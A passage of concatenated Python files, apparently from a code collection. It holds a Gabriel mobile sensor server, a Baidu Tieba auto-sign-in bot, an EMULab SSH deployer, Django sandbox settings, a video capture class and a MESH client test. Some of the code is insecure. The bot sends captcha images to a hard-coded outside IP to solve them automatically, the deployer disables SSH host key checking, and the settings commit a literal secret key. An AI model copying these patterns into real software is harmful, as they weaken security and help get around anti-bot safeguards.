with open(os.path.join(gabriel.Const.LOG_IMAGES_PATH, "frame-" + gabriel.util.add_preceding_zeros(self.log_images_counter) + ".jpeg"), "w") as f:
f.write(image_data)
if self.log_images_timing is not None:
self.log_images_timing.write("%d,%d\n" % (self.log_images_counter, int(time.time() * 1000)))
## write images into a video
if gabriel.Debug.SAVE_VIDEO:
import cv2
import numpy as np
img_array = np.asarray(bytearray(image_data), dtype = np.int8)
cv_image = cv2.imdecode(img_array, -1)
print(cv_image.shape)
if not self.log_video_writer_created:
self.log_video_writer_created = True
self.log_video_writer = cv2.VideoWriter(gabriel.Const.LOG_VIDEO_PATH, cv2.cv.CV_FOURCC('X','V','I','D'), 10, (cv_image.shape[1], cv_image.shape[0]))
self.log_video_writer.write(cv_image)
class MobileAccHandler(MobileSensorHandler):
def setup(self):
super(MobileAccHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
if gabriel.Debug.SAVE_ACC:
self.acc_log = open(gabriel.Const.LOG_ACC_PATH, "w")
def __repr__(self):
return "Mobile Acc Server"
def chunks(self, data, n):
for i in range(0, len(data), n):
yield data[i : i + n]
def _handle_input_data(self):
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
acc_size = struct.unpack("!I", self._recv_all(4))[0]
acc_data = self._recv_all(acc_size)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + acc_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "ACC FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(acc_queue_list))
LOG.info(log_msg)
## log acc data
if gabriel.Debug.SAVE_ACC:
ACC_SEGMENT_SIZE = 12 # (float, float, float)
t = int(time.time() * 1000)
for chunk in self.chunks(acc_data, ACC_SEGMENT_SIZE):
(acc_x, acc_y, acc_z) = struct.unpack("!fff", chunk)
self.acc_log.write("%d,%f,%f,%f\n" % (t, acc_x, acc_y, acc_z))
## put current acc data in all registered cognitive engine queue
for acc_queue in acc_queue_list:
if acc_queue.full():
try:
acc_queue.get_nowait()
except queue.Empty as e:
pass
try:
acc_queue.put_nowait((header_data, acc_data))
except queue.Full as e:
pass
class MobileAudioHandler(MobileSensorHandler):
def setup(self):
super(MobileAudioHandler, self).setup()
if gabriel.Debug.LOG_STAT:
self.frame_count = 0
self.total_recv_size = 0
def __repr__(self):
return "Mobile Audio Server"
def _handle_input_data(self):
## receive data
header_size = struct.unpack("!I", self._recv_all(4))[0]
header_data = self._recv_all(header_size)
header_json = json.loads(header_data)
audio_size = struct.unpack("!I", self._recv_all(4))[0]
audio_data = self._recv_all(audio_size)
## stats
if gabriel.Debug.LOG_STAT:
self.frame_count += 1
current_time = time.time()
self.total_recv_size += (header_size + audio_size + 8)
current_FPS = 1 / (current_time - self.previous_time)
self.previous_time = current_time
average_FPS = self.frame_count / (current_time - self.init_connect_time)
if (self.frame_count % 100 == 0):
log_msg = "Audio FPS : current(%f), avg(%f), BW(%f Mbps), offloading engine(%d)" % \
(current_FPS, average_FPS, 8 * self.total_recv_size / (current_time - self.init_connect_time) / 1000 / 1000, len(audio_queue_list))
LOG.info(log_msg)
## put current audio data in all registered cognitive engine queue
for audio_queue in audio_queue_list:
if audio_queue.full():
try:
audio_queue.get_nowait()
except queue.Empty as e:
pass
try:
audio_queue.put((header_data, audio_data))
except queue.Full as e:
pass
class MobileResultHandler(MobileSensorHandler):
def setup(self):
super(MobileResultHandler, self).setup()
# flush out old result at Queue
while not result_queue.empty():
result_queue.get()
self.data_queue = result_queue
if gabriel.Debug.TIME_MEASUREMENT:
self.time_breakdown_log = open("log-time-breakdown.txt", "w")
def __repr__(self):
return "Mobile Result Server"
@staticmethod
def _add_data_to_debug_server(rtn_header_json, rtn_data_json):
"""Add data to debug server.
Debug server accepts 4 types of data: annotated input image with detected object, video instruction,
image instruction, and text instruction. It only supports instructions in json format (legacy).
"""
# only the annotated debug image are in the header, everything else are in the data
image_encoded = rtn_header_json.get(gabriel.Protocol_debug.JSON_KEY_ANNOTATED_INPUT_IMAGE, None)
if image_encoded is not None:
image_data = base64.b64decode(image_encoded)
if output_display_queue_dict['debug'].full():
try:
output_display_queue_dict['debug'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['debug'].put_nowait(image_data)
except queue.Full as e:
pass
# image response
image_encoded = rtn_data_json.get('image', None)
if image_encoded is not None:
image_data = base64.b64decode(image_encoded)
if output_display_queue_dict['image'].full():
try:
output_display_queue_dict['image'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['image'].put_nowait(image_data)
except queue.Full as e:
pass
# text response
text_data = rtn_data_json.get('speech', None)
if text_data is not None:
if output_display_queue_dict['text'].full():
try:
output_display_queue_dict['text'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['text'].put_nowait(text_data)
except queue.Full as e:
pass
# video response
video_url = rtn_data_json.get('video', None)
if video_url is not None:
if output_display_queue_dict['video'].full():
try:
output_display_queue_dict['video'].get_nowait()
except queue.Empty as e:
pass
try:
output_display_queue_dict['video'].put_nowait(video_url)
except queue.Full as e:
pass
@staticmethod
def _remove_debug_header_fields(rtn_header_json):
rtn_header_json.pop(gabriel.Protocol_debug.JSON_KEY_ANNOTATED_INPUT_IMAGE, None)
def _handle_queue_data(self):
try:
(rtn_header, rtn_data) = self.data_queue.get(timeout = 0.0001)
rtn_header_json = json.loads(rtn_header)
## log measured time
if gabriel.Debug.TIME_MEASUREMENT:
frame_id = rtn_header_json[gabriel.Protocol_client.JSON_KEY_FRAME_ID]
now = time.time()
control_recv_from_mobile_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME, -1)
app_recv_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_RECV_TIME, -1)
app_sent_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_SENT_TIME, -1)
symbolic_done_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_APP_SYMBOLIC_TIME, -1)
ucomm_recv_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_UCOMM_RECV_TIME, -1)
ucomm_sent_time = rtn_header_json.get(gabriel.Protocol_measurement.JSON_KEY_UCOMM_SENT_TIME, -1)
# no need to send the time info back to the client
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_CONTROL_RECV_FROM_MOBILE_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_SENT_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_RECV_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_UCOMM_RECV_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_UCOMM_SENT_TIME, None)
rtn_header_json.pop(gabriel.Protocol_measurement.JSON_KEY_APP_SYMBOLIC_TIME, None)
if self.time_breakdown_log is not None:
self.time_breakdown_log.write("%s\t%f\t%f\t%f\t%f\t%f\t%f\t%f\n" %
(frame_id, control_recv_from_mobile_time, app_recv_time, symbolic_done_time, app_sent_time, ucomm_recv_time, ucomm_sent_time, now))
if gabriel.Debug.WEB_SERVER:
if gabriel.Const.LEGACY_JSON_ONLY_RESULT:
rtn_data_json = json.loads(rtn_data)
self._add_data_to_debug_server(rtn_header_json, rtn_data_json)
else:
raise NotImplementedError("Debug server only support legacy mode!")
self._remove_debug_header_fields(rtn_header_json)
## send return data to the mobile device
# packet format: header size, header, data
# add data size as a field in header for backward compatibility
rtn_header_json[gabriel.Protocol_client.JSON_KEY_DATA_SIZE]=len(rtn_data)
rtn_header = json.dumps(rtn_header_json)
if gabriel.Const.LEGACY_JSON_ONLY_RESULT:
rtn_header_json[gabriel.Protocol_client.JSON_KEY_RESULT_MESSAGE]=rtn_data
rtn_header=json.dumps(rtn_header_json)
packet = struct.pack("!I{}s".format(len(rtn_header)), len(rtn_header), rtn_header)
LOG.info("message sent to the Glass: %s", gabriel.util.print_rtn(rtn_header_json))
else:
packet = struct.pack("!I{}s{}s".format(len(rtn_header),len(rtn_data)), len(rtn_header), rtn_header, rtn_data)
LOG.info("message sent to the Glass: %s", gabriel.util.print_rtn(rtn_header_json))
self.request.send(packet)
self.wfile.flush()
except queue.Empty:
LOG.warning("data queue shouldn't be empty! - %s" % str(self))
class MobileCommServer(gabriel.network.CommonServer):
def __init__(self, port, handler):
gabriel.network.CommonServer.__init__(self, port, handler) # cannot use super because it's old style class
LOG.info("* Mobile server(%s) configuration" % str(self.handler))
LOG.info(" - Open TCP Server at %s" % (str(self.server_address)))
LOG.info(" - Disable nagle (No TCP delay) : %s" %
str(self.socket.getsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY)))
LOG.info("-" * 50)
def terminate(self):
gabriel.network.CommonServer.terminate(self)
def main():
video_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_VIDEO_PORT, MobileVideoHandler)
video_thread = threading.Thread(target=video_server.serve_forever)
video_thread.daemon = True
acc_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_ACC_PORT, MobileAccHandler)
acc_thread = threading.Thread(target=acc_server.serve_forever)
acc_thread.daemon = True
audio_server = MobileCommServer(gabriel.Const.MOBILE_SERVER_AUDIO_PORT, MobileAudioHandler)
audio_thread = threading.Thread(target=audio_server.serve_forever)
audio_thread.daemon = True
try:
video_thread.start()
acc_thread.start()
audio_thread.start()
while True:
time.sleep(100)
except KeyboardInterrupt as e:
sys.stdout.write("Exit by user\n")
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(1)
except Exception as e:
sys.stderr.write(str(e))
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(1)
else:
video_server.terminate()
acc_server.terminate()
audio_server.terminate()
sys.exit(0)
if __name__ == '__main__':
main()
|
tieba_sign.py
|
#!/usr/bin/env python3
#coding=utf-8
import hashlib
import json
import os
import prettytable as pt
import pyzbar.pyzbar as pyzbar
import requests
import time
from io import BytesIO
from PIL import Image
from random import choice
from threading import Thread
class Tieba(object):
def __init__(self, users):
self.users = users
self.tb = pt.PrettyTable()
self.s = requests.session()
self.MD5_KEY = 'tiebaclient!!!'
self.CAPTCHA_API = 'http://222.187.238.211:10086/b'
self.INDEX_URL = 'https://tieba.baidu.com/index.html'
self.TBS_URL = 'http://tieba.baidu.com/dc/common/tbs'
self.LIKES_URL = 'http://c.tieba.baidu.com/c/f/forum/like'
self.SIGN_URL = 'http://c.tieba.baidu.com/c/c/forum/sign'
self.GEN_IMG_URL = 'https://tieba.baidu.com/cgi-bin/genimg'
self.QR_CODE_URL = 'https://passport.baidu.com/v2/api/getqrcode'
self.UNICAST_URL = 'https://passport.baidu.com/channel/unicast'
self.USER_INFO_URL = 'https://tieba.baidu.com/f/user/json_userinfo'
self.QR_LOGIN_URL = 'https://passport.baidu.com/v3/login/main/qrbdusslogin'
self.HAO123_URL = 'https://user.hao123.com/static/crossdomain.php'
self.MY_LIKE_URL = 'http://tieba.baidu.com/f/like/mylike'
self.ALL_TIEBA_LIST = []
self.tb.field_names = ['贴吧', '状态']
self.headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'Host': 'c.tieba.baidu.com',
'User-Agent': 'bdtb for Android 10.3.8.10'
}
def get_time_stamp(self):
return str(int(time.time() * 1000))
def save_cookie(self, user):
cookie_dict = self.s.cookies.get_dict()
with open('.%s' % user, 'w') as f:
json.dump(cookie_dict, f)
f.close()
def load_cookie(self, user):
with open('.%s' % user, 'r') as f:
cookie_dict = json.loads(f.read())
f.close()
for k, v in cookie_dict.items():
self.s.cookies.set(k, v)
def unicast(self, channel_id):
tt = self.get_time_stamp()
r = self.s.get(
url = self.UNICAST_URL,
params = {
'channel_id': channel_id,
'tpl': 'tb',
'apiver': 'v3',
'callback': '',
'tt': tt,
'_': tt
}
)
rsp = r.text.replace('(','').replace(')','')
rsp_json = json.loads(rsp)
try:
channel_v = json.loads(rsp_json['channel_v'])
return channel_v
except:
print('扫描超时')
def qr_login_set_cookie(self, bduss):
tt = self.get_time_stamp()
r = self.s.get(
url = self.QR_LOGIN_URL,
params = {
'v': tt,
'bduss': bduss,
'u': self.INDEX_URL,
'loginVersion': 'v4',
'qrcode': '1',
'tpl': 'tb',
'apiver': 'v3',
'tt': tt,
'alg': 'v1',
'time': tt[10:]
}
)
rsp = json.loads(r.text.replace("'",'"').replace('\\', '\\\\'))
bdu = rsp['data']['hao123Param']
self.s.get(f'{self.HAO123_URL}?bdu={bdu}&t={tt}')
self.s.get(self.MY_LIKE_URL)
def down_qr_code(self, imgurl):
r = self.s.get(f'https://{imgurl}')
with open('qrcode.png', 'wb') as f:
f.write(r.content)
f.close()
def read_qr_code(self, imgurl):
self.down_qr_code(imgurl)
img = Image.open('qrcode.png')
barcodes = pyzbar.decode(img)
for barcode in barcodes:
barcodeData = barcode.data.decode("utf-8")
return barcodeData
def get_qr_code(self):
tt = self.get_time_stamp()
r = self.s.get(
url = self.QR_CODE_URL,
params = {
'lp': 'pc',
'qrloginfrom': 'pc',
'apiver': 'v3',
'tt': tt,
'tpl': 'tb',
'_': tt
}
)
app = input('有百度贴吧APP / 百度APP,请输入 1 ,没有请输入 2\n:')
imgurl = r.json()['imgurl']
while True:
if app == '1':
print(f'请使用浏览器打开二维码链接并使用百度贴吧APP / 百度APP扫描:https://{imgurl}')
print('注意:请使用IE浏览器打开二维码链接!!!')
break
elif app == '2':
qrurl = self.read_qr_code(imgurl)
os.remove('./qrcode.png')
print(f'请使用已经登录了百度贴吧网页端的浏览器打开链接并按照提示完成登陆:{qrurl}')
break
channel_id = r.json()['sign']
return channel_id
def qr_login(self, user):
channel_id = self.get_qr_code()
while True:
rsp = self.unicast(channel_id)
if rsp and rsp['status'] == 1: print('扫描成功,请在手机端确认登录!')
if rsp and rsp['status'] == 0:
print('确认登陆成功')
bduss = rsp['v']
self.qr_login_set_cookie(bduss)
self.save_cookie(user)
break
def login(self, user):
self.s.cookies.clear()
self.qr_login(user)
print('Login: True')
tiebas = self.get_like_tiebas()
self.ALL_TIEBA_LIST.extend(tiebas)
self.start(tiebas)
def check_login(self):
r = self.s.get(self.TBS_URL)
rsp = r.json()
return True if rsp['is_login'] == 1 else False
def calc_sign(self, str_dict):
md5 = hashlib.md5()
md5.update((
''.join(
'%s=%s' % (k, v)
for k, v in str_dict.items()
) + self.MD5_KEY).encode('utf-8')
)
return md5.hexdigest().upper()
def get_bduss_stoken(self):
bduss = self.s.cookies.get_dict()['BDUSS']
stoken = self.s.cookies.get_dict()['STOKEN']
return bduss, stoken
def get_like_tiebas(self):
bduss, stoken = self.get_bduss_stoken()
data = {
'BDUSS': bduss,
'stoken': stoken,
'timestamp': self.get_time_stamp()
}
data['sign'] = self.calc_sign(data)
for _ in range(5):
try:
r = requests.post(
url = self.LIKES_URL,
data = data,
cookies = self.s.cookies,
headers = self.headers,
timeout=3
)
except:
continue
return [tieba['name'] for tieba in r.json()['forum_list']]
def get_tbs(self):
r = self.s.get(self.TBS_URL).json()
return r['tbs']
def recognize_captcha(self, remote_url, rec_times=3):
for _ in range(rec_times):
while True:
try:
response = requests.get(remote_url, timeout=6)
if response.text:
break
else:
print("retry, response.text is empty")
except Exception as ee:
print(ee)
files = {'image_file': ('captcha.jpg', BytesIO(response.content), 'application')}
r = requests.post(self.CAPTCHA_API, files=files)
try:
predict_text = json.loads(r.text)["value"]
return predict_text
except:
continue
def sign_with_vcode(self, tieba, tbs, captcha_input_str, captcha_vcode_str):
"""
由于暂时没碰见需要验证码的情况,
故此处只是print
"""
print(f'{tieba} 需要验证码')
def sign(self, tieba):
tbs = self.get_tbs()
bduss, stoken = self.get_bduss_stoken()
data = {
'BDUSS': bduss,
'kw': tieba,
'stoken': stoken,
'tbs': tbs,
'timestamp': self.get_time_stamp()
}
sign = self.calc_sign(data)
data['sign'] = sign
for _ in range(5):
try:
r = requests.post(
url = self.SIGN_URL,
data = data,
cookies = self.s.cookies,
headers = self.headers,
timeout=5
)
rsp = r.json()
break
except:
continue
try:
if rsp['user_info']['is_sign_in'] == 1:
self.tb.add_row([tieba, '签到成功'])
except:
if rsp['error_msg'] == 'need vcode': # 这里也不清楚手机端需不需要验证码
captcha_vcode_str = rsp['data']['captcha_vcode_str']
captcha_url = f'{self.GEN_IMG_URL}?{captcha_vcode_str}'
captcha_input_str = self.recognize_captcha(captcha_url)
self.sign_with_vcode(tieba, tbs, captcha_input_str, captcha_vcode_str)
else:
self.tb.add_row([tieba, rsp['error_msg']])
def start(self, tiebas):
threads = []
for tieba in tiebas:
t = Thread(target=self.sign, args=(tieba,))
threads.append(t)
for tieba in threads:
tieba.start()
for tieba in threads:
tieba.join()
def main(self):
start_time = time.time()
for user in self.users:
print(f'当前登陆: {user}')
if os.path.exists('.%s' % user):
self.load_cookie(user)
if self.check_login():
print('CookieLogin: True')
tiebas = self.get_like_tiebas()
self.ALL_TIEBA_LIST.extend(tiebas)
self.start(tiebas)
else:
print('%sCookies失效...正在重新登录...' % user)
self.login(user)
else:
self.login(user)
self.tb.align = 'l'
print(self.tb)
self.tb.clear_rows()
else:
end_time = time.time()
print('总共签到{}个贴吧,耗时:{}秒'.format(
len(self.ALL_TIEBA_LIST),
int(end_time - start_time)
)
)
if __name__ == "__main__":
user_lists = [''] # 贴吧用户名列表,例如 ['张三', '李四']
tieba = Tieba(user_lists)
tieba.main()
|
oversee.py
|
import sys
import json
import paramiko
import time
from threading import Thread, Lock
stdout_lock = Lock()
def suckPipe(chan):
while not chan.exit_status_ready() or chan.recv_ready():
if chan.recv_ready():
data = chan.recv(1024)
stdout_lock.acquire()
sys.stdout.write(data)
stdout_lock.release()
def shellquote(s):
return "'" + s.replace("'", "'\\''") + "'"
def getSSHCmd(host, cmd):
return "ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no %s %s" % (host, shellquote(cmd))
def activatePhysicalNode(client, pnos):
def eachPhysicalNode(pno):
host = "node%d.onenet.infosphere" % pno
cmd = "cd onenet; sh start_node.sh %d" % pno
_, pout, _ = client.exec_command(getSSHCmd(host, cmd))
return pout
return map(eachPhysicalNode, pnos)
data = json.load(sys.stdin)
pnos = set(map(lambda n: n['pno'], data['nodes']))
sys.stdout.write("** Summary:\n")
sys.stdout.write("** %d nodes, %d switches, %d links\n" % (len(data['nodes']), len(data['switches']), len(data['links'])))
sys.stdout.write("** %d physical machines %s\n" % (len(pnos), list(pnos)))
sys.stdout.write("\n")
sys.stdout.write("** Connecting to EMULab\n")
client = paramiko.SSHClient()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect('ops.emulab.net', username='mininet')
sftp = client.open_sftp()
sys.stdout.write("** Uploading topology\n")
with sftp.open('onenet/topo.js', 'w') as f:
f.write(json.dumps(data))
sys.stdout.write("** Uploading experiment code\n")
with sftp.open('onenet/experiment.py', 'w') as f:
f.write(data['code']['experiment'])
sys.stdout.write("** Uploading controller code\n")
with sftp.open('pox/pox/controller.py', 'w') as f:
f.write(data['code']['controller'])
sys.stdout.write("** Activating physical nodes\n")
pipes = activatePhysicalNode(client, pnos)
sys.stdout.write("** Activating the control node\n")
chan = client.get_transport().open_session()
chan.exec_command(getSSHCmd("c.onenet.infosphere", "sh onenet/start_control.sh"))
thd_control = Thread(target=suckPipe, args=(chan,))
thd_control.start()
thd_control.join()
|
settings.py
|
"""
Django settings for sandbox project.
Generated by 'django-admin startproject' using Django 2.2.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import logging
import os
import sys
import threading
import platform
from apscheduler.triggers.cron import CronTrigger
from docker.types import Ulimit
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+61drt2^c32qp)knvy32m*xm*ew=po%f8a9l!bp$kd7mz3(109'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
# Set to true when 'python3 manage.py test' is used
TESTING = sys.argv[1:2] == ['test']
ALLOWED_HOSTS = ['127.0.0.1']
# Application definition
INSTALLED_APPS = [
'sandbox',
]
MIDDLEWARE = [
'django_http_exceptions.middleware.ExceptionHandlerMiddleware',
'django_http_exceptions.middleware.ThreadLocalRequestMiddleware',
]
ROOT_URLCONF = 'urls'
WSGI_APPLICATION = 'wsgi.application'
# Database
DATABASES = dict()
# Needed for manage.py to run without database
TEST_RUNNER = 'testing.DatabaseLessTestRunner'
# Password validation
AUTH_PASSWORD_VALIDATORS = list()
# Write email in console instead of sending it if DEBUG is set to True
if DEBUG:
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Logger information
LOGGER_ADDRESS = '/dev/log'
if platform.system() == 'Darwin':
# https://docs.python.org/3/library/logging.handlers.html#sysloghandler
LOGGER_ADDRESS = '/var/run/syslog'
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'formatters': {
'verbose': {
'format': ("[%(asctime)-15s] [%(pathname)s]"
"[%(filename)s:%(funcName)s:%(lineno)d]"
" %(levelname)s -- %(message)s"),
'datefmt': '%Y/%m/%d %H:%M:%S'
},
'simple': {
'format': ("[%(asctime)s] [%(filename)s:%(funcName)s:%(lineno)d]"
" %(levelname)s -- %(message)s"),
'datefmt': '%H:%M:%S'
},
},
'handlers': {
'console': {
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'syslog': {
'level': 'INFO',
'class': 'logging.handlers.SysLogHandler',
'facility': 'local6',
'address': LOGGER_ADDRESS,
'formatter': 'verbose',
'filters': ['require_debug_false'],
},
'syslog_debug': {
'level': 'DEBUG',
'class': 'logging.handlers.SysLogHandler',
'facility': 'local6',
'address': LOGGER_ADDRESS,
'formatter': 'verbose',
'filters': ['require_debug_true'],
},
'mail_admins': {
'level': 'WARNING',
'class': 'django.utils.log.AdminEmailHandler',
'include_html': True,
'formatter': 'verbose'
}
},
'loggers': {
'sandbox': {
'handlers': ['console', 'syslog', 'mail_admins', 'syslog_debug'],
'level': 'DEBUG',
'propagate': True,
},
'django': {
'handlers': ['console', 'syslog', 'mail_admins', 'syslog_debug'],
'level': 'INFO',
},
'django.request': {
'handlers': ['console', 'syslog', 'syslog_debug'],
'level': 'WARNING',
'propagate': False,
}
},
}
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# External libraries will be added to containers in /utils/libs/, this directory will be added
# to both PATH and PYTHONPATH environment variables.
# Each external lib must be a tuple (GIT_URL, ALIAS), where GIT_URL is the URL 'git clone'
# will use, ALIAS the directory in which the library will be cloned.
EXTERNAL_LIBRARIES = [
("https://github.com/PremierLangage/premierlangage-lib.git", "pl"),
]
# Path where the libraries are downloaded
EXTERNAL_LIBRARIES_ROOT = os.path.join(BASE_DIR, 'libs')
if not os.path.isdir(EXTERNAL_LIBRARIES_ROOT):
os.makedirs(EXTERNAL_LIBRARIES_ROOT)
# The CronTrigger triggering the update of the external libraries, see
# https://apscheduler.readthedocs.io/en/latest/modules/triggers/cron.html for more information.
EXTERNAL_LIBRARIES_CRON_TRIGGER = CronTrigger(
year="*",
month="*",
day="*",
week="*",
day_of_week="*",
hour="*/2",
minute="0",
second="0",
)
SANDBOX_VERSION = "3.0.3"
# Time before returning a '503: Service Unavailable' when waiting for a container.
WAIT_FOR_CONTAINER_DURATION = 2
# Total time for an '/execute/' request before timeout
EXECUTE_TIMEOUT = 10.0
# Directory where environments are stored
ENVIRONMENT_ROOT = os.path.join(BASE_DIR, 'environments')
if not os.path.isdir(ENVIRONMENT_ROOT):
os.makedirs(ENVIRONMENT_ROOT)
# ENVIRONMENT_EXPIRATION: Time before the environment are deleted.
HOUR = 3600
DAY = HOUR * 24
ENVIRONMENT_EXPIRATION = DAY
#
# DOCKER_COUNT (int) – Max number of containers running simultaneously.
# DOCKER_VOLUME_MEM_LIMIT (int) – Limit of memory usage for volumes (in MB).
# DOCKER_VOLUME_HOST_BASEDIR (str) – Path to the root directory containing each directory shared
# with the containers. For each container, a directory named after the container's name is
# created inside DOCKER_VOLUME_HOST_BASEDIR.
#
# DOCKER_PARAMETERS (dict) - kwargs given to the Containers constructor. See
# https://docker-py.readthedocs.io/en/stable/containers.html and
# https://docs.docker.com/config/containers/resource_constraints/ for more information about
# every argument
DOCKER_COUNT = 20
DOCKER_VOLUME_HOST_BASEDIR = os.path.join(BASE_DIR, 'containers_env')
DOCKER_PARAMETERS = {
"image": "pl:latest",
"auto_remove": True,
"cpu_period": 1000,
"cpu_shares": 1024,
"cpu_quota": 0,
"cpuset_cpus": "0",
"detach": True,
"environment": {},
"mem_limit": "100m",
"memswap_limit": "200m",
"network_mode": "none",
"network_disabled": True,
# "storage_opt": {},
"tty": True,
"ulimits": [
Ulimit(name="core", soft=0, hard=0)
],
}
# Check if any of the above settings are override by a config.py file.
logger = logging.getLogger(__name__)
try:
from config import * # noqa
logger.info("Using config.py...")
except ModuleNotFoundError:
logger.info("No config file found")
del logger
# Override some settings from testing purpose
if TESTING:
DOCKER_COUNT = 5
from sandbox.containers import initialise_containers # noqa
INITIALISING_THREAD = threading.Thread(target=initialise_containers)
INITIALISING_THREAD.start()
|
videocaptureasync.py
|
# file: videocaptureasync.py
import threading
import cv2
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def start(self):
if self.started:
print('[!] Asynchroneous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=())
self.thread.start()
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
|
mesh_client_test.py
|
from __future__ import absolute_import, print_function
from unittest import TestCase, main
import random
import signal
import sys
import threading
import traceback
from mesh_client import MeshClient, MeshError, default_ssl_opts
from fake_mesh.server import make_server
def print_stack_frames(signum=None, frame=None):
for frame in sys._current_frames().values():
traceback.print_stack(frame)
print()
signal.signal(signal.SIGUSR1, print_stack_frames)
class TestError(Exception):
pass
class MeshClientTest(TestCase):
uri = 'https://localhost:8829'
@classmethod
def setUpClass(cls):
cls.server = make_server(host='127.0.0.1', port=8829, logging=True)
cls.server_thread = threading.Thread(target=cls.server.start)
cls.server_thread.start()
@classmethod
def tearDownClass(cls):
cls.server.stop()
cls.server_thread.join()
def setUp(self):
self.alice_mailbox = str(random.randint(0, 1000000000000))
self.bob_mailbox = str(random.randint(0, 1000000000000))
self.alice = MeshClient(
self.uri,
self.alice_mailbox,
'password',
max_chunk_size=5,
**default_ssl_opts)
self.bob = MeshClient(
self.uri,
self.bob_mailbox,
'password',
max_chunk_size=5,
**default_ssl_opts)
def test_handshake(self):
alice = self.alice
hand_shook = alice.handshake()
self.assertEqual(hand_shook, b"hello")
def test_send_receive(self):
alice = self.alice
bob = self.bob
message_id = alice.send_message(self.bob_mailbox, b"Hello Bob 1")
self.assertEqual([message_id], bob.list_messages())
msg = bob.retrieve_message(message_id)
self.assertEqual(msg.read(), b"Hello Bob 1")
self.assertEqual(msg.sender, self.alice_mailbox)
self.assertEqual(msg.recipient, self.bob_mailbox)
self.assertEqual(msg.filename, message_id + '.dat')
msg.acknowledge()
self.assertEqual([], bob.list_messages())
def test_optional_args(self):
alice = self.alice
bob = self.bob
message_id = alice.send_message(
self.bob_mailbox,
b"Hello Bob 5",
subject="Hello World",
filename="upload.txt",
local_id="12345",
message_type="DATA",
process_id="321",
workflow_id="111",
encrypted=False,
compressed=False)
with bob.retrieve_message(message_id) as msg:
self.assertEqual(msg.subject, "Hello World")
self.assertEqual(msg.filename, "upload.txt")
self.assertEqual(msg.local_id, "12345")
self.assertEqual(msg.message_type, "DATA")
self.assertEqual(msg.process_id, "321")
self.assertEqual(msg.workflow_id, "111")
self.assertFalse(msg.encrypted)
self.assertFalse(msg.compressed)
message_id = alice.send_message(
self.bob_mailbox, b"Hello Bob 5", encrypted=True, compressed=True)
with bob.retrieve_message(message_id) as msg:
self.assertTrue(msg.encrypted)
self.assertTrue(msg.compressed)
def test_endpoint_lookup(self):
result = self.alice.lookup_endpoint('ORG1', 'WF1')
result_list = result['results']
self.assertEqual(len(result_list), 1)
self.assertEqual(result_list[0]['address'], 'ORG1HC001')
self.assertEqual(result_list[0]['description'], 'ORG1 WF1 endpoint')
self.assertEqual(result_list[0]['endpoint_type'], 'MESH')
def test_tracking(self):
alice = self.alice
bob = self.bob
tracking_id = 'Message1'
msg_id = alice.send_message(self.bob_mailbox, b'Hello World', local_id=tracking_id)
